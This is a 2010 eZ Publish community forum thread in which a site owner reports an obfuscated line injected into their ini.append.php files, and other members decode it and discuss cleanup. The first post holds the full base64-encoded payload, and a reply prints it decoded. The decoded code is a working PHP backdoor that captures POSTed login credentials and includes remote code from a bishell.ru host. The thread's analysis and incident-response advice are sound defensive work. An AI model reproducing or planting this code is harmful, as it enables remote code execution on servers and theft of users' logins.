eZ Community » Forums » General » Weired line in most of my ini.append.php
expandshrink

Weired line in most of my ini.append.php

Weired line in most of my ini.append.php

Friday 02 April 2010 8:44:38 pm - 10 replies

Hello,

This line appears in most of my ini.append.php files. What is it?

error_reporting(0);$p="bffjhzzazbzgf";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnZhciAkZnVsbHVybDsgdmFyICRwX3VybDsgdmFyICRjb25uX2lkOyB2YXIgJGZsdXNoZWQ7IHZhciAkbW9kZSA9IDQ7IHZhciAkZGVmbW9kZTsgdmFyICRyZWRpcmVjdHMgPSAwOyB2YXIgJGJpbmFyeTsgdmFyICRvcHRpb25zOyB2YXIgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KZnVuY3Rpb24gZXJyb3IoJG1zZz0nbm90IGNvbm5lY3RlZCcpIHsgaWYgKCR0aGlzLT5vcHRpb25zICYgU1RSRUFNX1JFUE9SVF9FUlJPUlMpIHsgdHJpZ2dlcl9lcnJvcigkbXNnLCBFX1VTRVJfV0FSTklORyk7IH0gcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fb3BlbigkcGF0aCwgJG1vZGUsICRvcHRpb25zLCAkb3BlbmVkX3BhdGgpIHsgJHRoaXMtPmZ1bGx1cmwgPSAkcGF0aDsgJHRoaXMtPm9wdGlvbnMgPSAkb3B0aW9uczsgJHRoaXMtPmRlZm1vZGUgPSAkbW9kZTsgJHVybCA9IHBhcnNlX3VybCgkcGF0aCk7IGlmIChlbXB0eSgkdXJsWydob3N0J10pKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ21pc3NpbmcgaG9zdCBuYW1lJyk7IH0gJHRoaXMtPmNvbm5faWQgPSBmc29ja29wZW4oJHVybFsnaG9zdCddLCAoZW1wdHkoJHVybFsncG9ydCddKSA/IDgwIDogaW50dmFsKCR1cmxbJ3BvcnQnXSkpLCAkZXJybm8sICRlcnJzdHIsIDIpOyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZW1wdHkoJHVybFsncGF0aCddKSkgeyAkdXJsWydwYXRoJ10gPSAnLyc7IH0gJHRoaXMtPnBfdXJsID0gJHVybDsgJHRoaXMtPmZsdXNoZWQgPSBmYWxzZTsgaWYgKCRtb2RlWzBdICE9ICdyJyB8fCAoc3RycG9zKCRtb2RlLCAnKycpICE9PSBmYWxzZSkpIHsgJHRoaXMtPm1vZGUgKz0gMjsgfSAkdGhpcy0+YmluYXJ5ID0gKHN0cnBvcygkbW9kZSwgJ2InKSAhPT0gZmFsc2UpOyAkYyA9ICR0aGlzLT5jb250ZXh0KCk7IGlmICghaXNzZXQoJGNbJ21ldGhvZCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAnR0VUJyk7IH0gaWYgKCFpc3NldCgkY1snaGVhZGVyJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2hlYWRlcicsICcnKTsgfSBpZiAoIWlzc2V0KCRjWyd1c2VyX2FnZW50J10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ3VzZXJfYWdlbnQnLCBpbmlfZ2V0KCd1c2VyX2FnZW50JykpOyB9IGlmICghaXNzZXQoJGNbJ2NvbnRlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICcnKTsgfSBpZiAoIWlzc2V0KCRjWydtYXhfcmVkaXJlY3RzJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21heF9yZWRpcmVjdHMnLCA1KTsgfSByZXR1cm4gdHJ1ZTsgfQ0KZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCmZ1bmN0aW9uIHN0cmVhbV9yZWFkKCRieXRlcykgeyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkICYmICEkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChmZW9mKCR0aGlzLT5jb25uX2lkKSkgeyByZXR1cm4gJyc7IH0gJGJ5dGVzID0gbWF4KDEsJGJ5dGVzKTsgaWYgKCR0aGlzLT5iaW5hcnkpIHsgcmV0dXJuIGZyZWFkKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IGVsc2UgeyByZXR1cm4gZmdldHMoJHRoaXMtPmNvbm5faWQsICRieXRlcyk7IH0gfQ0KZnVuY3Rpb24gc3RyZWFtX3dyaXRlKCRkYXRhKSB7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuICR0aGlzLT5lcnJvcigpOyB9IGlmICghJHRoaXMtPm1vZGUgJiAyKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ1N0cmVhbSBpcyBpbiByZWFkLW9ubHkgbW9kZScpOyB9ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWV0aG9kJywgKCgkdGhpcy0+ZGVmbW9kZVswXSA9PSAneCcpID8gJ1BVVCcgOiAnUE9TVCcpKTsgaWYgKHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2NvbnRlbnQnLCAkY1snY29udGVudCddLiRkYXRhKSkgeyByZXR1cm4gc3RybGVuKCRkYXRhKTsgfSByZXR1cm4gMDsgfQ0KZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCmZ1bmN0aW9uIHN0cmVhbV9zZWVrKCRvZmZzZXQsICR3aGVuY2UpIHsgcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fdGVsbCgpIHsgcmV0dXJuIDA7IH0NCmZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RycG9zKCRkYXRhLCAnTG9jYXRpb246ICcpICE9PSBmYWxzZSkgeyAkbmV3X2xvY2F0aW9uID0gdHJpbShzdHJfcmVwbGFjZSgnTG9jYXRpb246ICcsICcnLCAkZGF0YSkpOyBicmVhazsgfSAkZGF0YSA9IHJ0cmltKGZnZXRzKCR0aGlzLT5jb25uX2lkLCAzMDApKTsgfSB0cmlnZ2VyX2Vycm9yKCR0aGlzLT5mdWxsdXJsLicgJy4kaGVhZFsyXS4nOiAnLiRuZXdfbG9jYXRpb24sIEVfVVNFUl9OT1RJQ0UpOyAkdGhpcy0+c3RyZWFtX2Nsb3NlKCk7IHJldHVybiAoJGNbJ21heF9yZWRpcmVjdHMnXSA+ICR0aGlzLT5yZWRpcmVjdHMrKyAmJiAkdGhpcy0+c3RyZWFtX29wZW4oJG5ld19sb2NhdGlvbiwgJHRoaXMtPmRlZm1vZGUsICR0aGlzLT5vcHRpb25zLCBudWxsKSAmJiAkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgd2hpbGUgKCFlbXB0eSgkZGF0YSkpIHsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyIC49ICRkYXRhLiJcclxuIjsgaWYgKHN0cnBvcygkZGF0YSwnQ29udGVudC1MZW5ndGg6ICcpICE9PSBmYWxzZSkgeyAkdGhpcy0+c3RhdFsnc2l6ZSddID0gdHJpbShzdHJfcmVwbGFjZSgnQ29udGVudC1MZW5ndGg6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdEYXRlOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ2F0aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0RhdGU6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdMYXN0LU1vZGlmaWVkOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ210aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0xhc3QtTW9kaWZpZWQ6ICcsICcnLCAkZGF0YSkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgfSBpZiAoJGhlYWRbMV0gPj0gNDAwKSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfV0FSTklORyk7IHJldHVybiBmYWxzZTsgfSBpZiAoJGhlYWRbMV0gPT0gMzA0KSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfTk9USUNFKTsgcmV0dXJuIGZhbHNlOyB9IHJldHVybiB0cnVlOyB9DQpmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCmZ1bmN0aW9uIGRpcl9vcGVuZGlyKCRwYXRoLCAkb3B0aW9ucykgeyByZXR1cm4gZmFsc2U7IH0NCmZ1bmN0aW9uIGRpcl9yZWFkZGlyKCkgeyByZXR1cm4gJyc7IH0NCmZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KZnVuY3Rpb24gZGlyX2Nsb3NlZGlyKCkgeyByZXR1cm47IH0NCmZ1bmN0aW9uIHVybF9zdGF0KCRwYXRoLCAkZmxhZ3MpIHsgcmV0dXJuIGFycmF5KCk7IH0NCmZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfWlmKGlzc2V0KCRfUE9TVFsibCJdKSBhbmQgaXNzZXQoJF9QT1NUWyJwIl0pKXtpZihpc3NldCgkX1BPU1RbImlucHV0Il0pKXskdXNlcl9hdXRoPSImbD0iLmJhc2U2NF9lbmNvZGUoJF9QT1NUWyJsIl0pLiImcD0iLmJhc2U2NF9lbmNvZGUobWQ1KCRfUE9TVFsicCJdKSk7fWVsc2V7JHVzZXJfYXV0aD0iJmw9Ii4kX1BPU1RbImwiXS4iJnA9Ii4kX1BPU1RbInAiXTt9fWVsc2V7JHVzZXJfYXV0aD0iIjt9aWYoIWlzc2V0KCRfUE9TVFsibG9nX2ZsZyJdKSl7JGxvZ19mbGc9IiZsb2ciO30NCiRya2h0PTE7aWYodmVyc2lvbl9jb21wYXJlKFBIUF9WRVJTSU9OLCc1LjInLCc+PScpKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfaW5jbHVkZScpKXskcmtodD0xO31lbHNleyRya2h0PTA7fX0NCmlmKCRya2h0PT0xKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQokdj0kcC5iYXNlNjRfZGVjb2RlKCJMblZ6WlhKekxtSnBjMmhsYkd3dWNuVT0iKS4iLz9yX2FkZHI9Ii5zcHJpbnRmKCIldSIsIGlwMmxvbmcoZ2V0ZW52KCJSRU1PVEVfQUREUiIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4kdXNlcl9hdXRoLiRsb2dfZmxnOw0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiR2KSl7fX0NCmVsc2V7c3RyZWFtX3dyYXBwZXJfcmVnaXN0ZXIoJ2h0dHAyJywnbmV3aHR0cCcpO2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjREk2THk4PSIpLiR2KSl7fX0="blunk.gif Emoticon);

 

Friday 02 April 2010 10:08:44 pm

Hi,

Try an online base-64 decoder, you'll notice this is an encoded php script. Looks fishy to me to say the least...

Regards Robin

Friday 02 April 2010 10:43:52 pm

Can you contact me: pb at ez dot no and send me one of those affected ini files?

Paul

Saturday 03 April 2010 9:26:53 am

Looks like a serious security breach in your INI file, if this piece of code does not occur inside comment blocks and if your ini.append.php files can be accessed directly over HTTP (if the proper rewrite rules are not in place).

That piece of code seems to include a script from an external site, so they can execute whatever PHP code they want. I recommend you to remove all occurrences of such code immediately.

Script pasted below, with most base 64 encoded parts replaced with their decoded value.

class newhttp {
    var $fullurl;
    var $p_url;
    var $conn_id;
    var $flushed;
    var $mode = 4;
    var $defmode;
    var $redirects = 0;
    var $binary;
    var $options;
    var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
    function error($msg='not connected') { 
        if ($this->options & STREAM_REPORT_ERRORS) { 
            trigger_error($msg, E_USER_WARNING);
        } return
        false;
    }
    function stream_open($path, $mode, $options, $opened_path) { 
        $this->fullurl = $path;
        $this->options = $options;
        $this->defmode = $mode;
        $url = parse_url($path);
        if (empty($url['host'])) { 
            return $this->error('missing host name');
        } $this
        ->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2);
        if (!$this->conn_id) { 
            return false;
        } if
        (empty($url['path'])) { 
            $url['path'] = '/';
        } $this
        ->p_url = $url;
        $this->flushed = false;
        if ($mode[0] != 'r' || (strpos($mode, '+') !== false)) { 
            $this->mode += 2;
        } $this
        ->binary = (strpos($mode, 'b') !== false);
        $c = $this->context();
        if (!isset($c['method'])) { 
            stream_context_set_option($this->context, 'http', 'method', 'GET');
        } if
        (!isset($c['header'])) { 
            stream_context_set_option($this->context, 'http', 'header', '');
        } if
        (!isset($c['user_agent'])) { 
            stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent'));
        } if
        (!isset($c['content'])) { 
            stream_context_set_option($this->context, 'http', 'content', '');
        } if
        (!isset($c['max_redirects'])) { 
            stream_context_set_option($this->context, 'http', 'max_redirects', 5);
        } return
        true;
    }
    function stream_close() { 
        if ($this->conn_id) { 
            fclose($this->conn_id);
            $this->conn_id = null;
        } 
    }
 
    function stream_read($bytes) { 
        if (!$this->conn_id) { 
            return $this->error();
        } if
        (!$this->flushed && !$this->stream_flush()) { 
            return false;
        } if
        (feof($this->conn_id)) { 
            return '';
        } $bytes
        = max(1,$bytes);
        if ($this->binary) { 
            return fread($this->conn_id, $bytes);
        } else { 
            return fgets($this->conn_id, $bytes);
        } 
    }
 
    function stream_write($data) { 
        if (!$this->conn_id) { 
            return $this->error();
        } if
        (!$this->mode & 2) { 
            return $this->error('Stream is in read-only mode');
        } $c
        = $this->context();
        stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST'));
        if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) { 
            return strlen($data);
        } return
        0;
    }
    function stream_eof() { 
        if (!$this->conn_id) { 
            return true;
        } if
        (!$this->flushed) { 
            return false;
        } return
        feof($this->conn_id);
    }
    function stream_seek($offset, $whence) { 
        return false;
    }
    function stream_tell() { 
        return 0;
    }
    function stream_flush() { 
        if ($this->flushed) { 
            return false;
        } if
        (!$this->conn_id) { 
            return $this->error();
        } $c
        = $this->context();
        $this->flushed = true;
        $RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' );
        if (!empty($c['header'])) { 
            $RequestHeaders[] = $c['header'];
        } if
        (!empty($c['content'])) { 
            if ($c['method'] == 'PUT') { 
                $RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain');
            } else { 
                $RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded';
            } $RequestHeaders
            [] = 'Content-Length: '.strlen($c['content']);
        } $RequestHeaders
        [] = 'Connection: close';
        if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) { 
            return false;
        } if
        (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) { 
            return false;
        } global
        $http_response_header;
        $http_response_header = fgets($this->conn_id, 300);
        $data = rtrim($http_response_header);
        preg_match('#.* ([0-9]+) (.*)#i', $data, $head);
        if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) { 
            $data = rtrim(fgets($this->conn_id, 300)); while (!empty($data)) { 
                if (strpos($data, 'Location: ') !== false) { 
                    $new_location = trim(str_replace('Location: ', '', $data));
                    break;
                } $data
                = rtrim(fgets($this->conn_id, 300));
            } trigger_error
            ($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE);
            $this->stream_close();
            return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush());
        } $data
        = rtrim(fgets($this->conn_id, 1024)); while (!empty($data)) { 
            $http_response_header .= $data."\r\n";
            if (strpos($data,'Content-Length: ') !== false) { 
                $this->stat['size'] = trim(str_replace('Content-Length: ', '', $data));
            } elseif (strpos($data,'Date: ') !== false) { 
                $this->stat['atime'] = strtotime(str_replace('Date: ', '', $data));
            } elseif (strpos($data,'Last-Modified: ') !== false) { 
                $this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data));
            } $data
            = rtrim(fgets($this->conn_id, 1024));
        } if
        ($head[1] >= 400) { 
            trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING);
            return false;
        } if
        ($head[1] == 304) { 
            trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE);
            return false;
        } return
        true;
    }
    function stream_stat() { 
        $this->stream_flush();
        return $this->stat;
    }
    function dir_opendir($path, $options) { 
        return false;
    }
    function dir_readdir() { 
        return '';
    }
    function dir_rewinddir() { 
        return '';
    }
    function dir_closedir() { 
        return;
    }
    function url_stat($path, $flags) { 
        return array();
    }
    function context() { 
        if (!$this->context) { 
            $this->context = stream_context_create();
        } $c
        = stream_context_get_options($this->context);
        return (isset($c['http']) ? $c['http'] : array());
    }
}if
(isset($_POST["l"]) and isset($_POST["p"])) {
    if(isset($_POST["input"])) {
        $user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));
    }else {
        $user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];
    }
}
else {
    $user_auth="";
}if
(!isset($_POST["log_flg"])) {
    $log_flg="&log";
}
$rkht=1;
if(version_compare(PHP_VERSION,'5.2','>=')) {
    if(ini_get('allow_url_include')) {
        $rkht=1;
    }else {
        $rkht=0;
    }
}
 
if($rkht==1) {
    if(ini_get('allow_url_fopen')) {
        $rkht=1;
    }else {
        $rkht=0;
    }
}
 
 
 
$v=$p.'.users.bishell.ru'."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
if($rkht==1) {
    if(!@include_once('http://'.$v)) {
 
    }
}
 
else {
    stream_wrapper_register('http2','newhttp');
    if(!@include_once('http://'.$v)) {
 
    }
}

Saturday 03 April 2010 10:57:50 am

wow... now this is a new one. Thank you Kristof for posting the decoded version.

There are a few results when looking for users.binshell.ru + either base64 or newhttp. One of them, quite well, explained, even though in french, seems to link the issue to FCKEditor, which would make sense here: http://markup.fr/Exploitation-d-une-vulnerabilite-de-FCK-Editor-sur-markup-fr.

This will have to be investigated urgently.

Saturday 03 April 2010 1:04:34 pm

Looks scary. One thing is what could happen if that piece of code was really malicious, the other thing, the really important one, is how it got there?...

Saturday 03 April 2010 2:52:11 pm

I have removed infections like that on three servers (not mine..). Probable sources of infection each time was joomla webs running under same http user, so once it was broken all the php files on server (many virtualhosts) were infected. Also, on two of them i discovered further root level exploit and backdoors installed. One had ssh server replaced with one that logged passwords.

My recommendation - get a new, clean server and restore webs to it from recent backup or if that is not possible, very very carefully clean everything. Take extra precautions when configuring new server - apache in suexec for each site, extra limitations for external execution and file open root for php etc.

Oh, and before you do anything else get the full backup of everything as it is at moment - remember someone is in control of it and can probably just rm -rf it all when he sees you are starting to fix it.

Saturday 03 April 2010 6:02:37 pm

@PB

I will send you some of the files to your emails.

OOzy

Saturday 03 April 2010 7:30:52 pm

May this help.

We have sugarcrm in a directory in the ez root. We noticed that the sugarcrm is not working and it shows only "White Blank Page". Two days later we notices that our website is showing weird data.

Thank you

OOzy

Saturday 03 April 2010 9:03:44 pm

Were only INI files "infected" or other *.php files as well? Can you find a correlation between files affected and write permissions rather than just INI files? If so, they source could as well be a "misplaced" ftp account access data (for example after a virus scanning e-mail messages), which actually once happened to one of our clients few years back and they had some similar stuff attached to nearly all their files.

Looking forward to any news on whether this is eZ Publish dependent, which I don't really expect.

BTW. which version of eZ Publish is that?

Cheers,
Piotrek

Sunday 04 April 2010 7:01:05 am

Hello,How can I know if other php file were infected. I actually upgraded from 4.1.3 to 4.2.0 to 4.3.0. But there were other *.php file (not ez) in the same directory of the settings files i.e. next to *.ini.I have already emailed Paul Borgermans of a bunch of infected files for his review and investigation.I will also talk to my hosting company that I bought the server from and see if they do something and I will keep ya posted.Oozy

expandshrink

You must be logged in to post messages in this topic!

36 542 Users on board!

Forums menu

Proudly Developed with from